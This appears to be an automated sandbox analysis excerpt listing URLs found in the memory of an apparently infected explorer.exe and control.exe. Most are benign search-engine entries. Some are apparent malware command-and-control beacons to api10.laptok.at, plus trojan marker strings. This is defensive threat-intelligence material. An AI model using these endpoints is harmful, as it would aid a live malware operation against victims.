Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.642401117.0000000000E60000.00000002.00000001.sdmp | String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6x
Source: {4B9FB8EA-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFED50CD2992DAC186.TMP.19.dr | String found in binary or memory: http://api10.laptok.at/api1/Ux95d5jvhDWgBFPIM/ok4wfBCrkY7o/rzRFNM5ZLlT/J64_2FA7bIXm0V/Azl4bbI6xGQ8EF
Source: {4B9FB8E8-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFEC43E79FA2AE0F5E.TMP.19.dr | String found in binary or memory: http://api10.laptok.at/api1/xTmMAvfM8U78kER_2F7EJnC/bkGInMvNpG/6BP8y1_2BixUNH8Ya/1_2BJ2jwUqv1/PwAIg5
Source: {4B9FB8E6-F8AF-11EA-90E2-ECF4BB862DED}.dat.19.dr, ~DFFF962DDB9C468E8F.TMP.19.dr | String found in binary or memory: http://api10.laptok.at/api1/zeKdvS5_2Fn9oM_2F/coexB5hfv5Xq/BKUHttHYtNW/us6FE9_2B_2B06/DIA0XeFh6yzS1L
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.662624699.000000000E2C2000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000024.00000003.666003970.0000000002810000.00000004.00000001.sdmp, control.exe, 00000025.00000003.657023151.000001C7A85C0000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmp | String found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 00000024.00000000.653677419.0000000005840000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 00000024.00000002.674152655.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
            Source: msapplication.xml.19.drString found in binary or memory: http://www.amazon.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 00000024.00000000.659633766.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 00000024.00000000.661591920.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 00000024.00000002.686052155.0000000005933000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
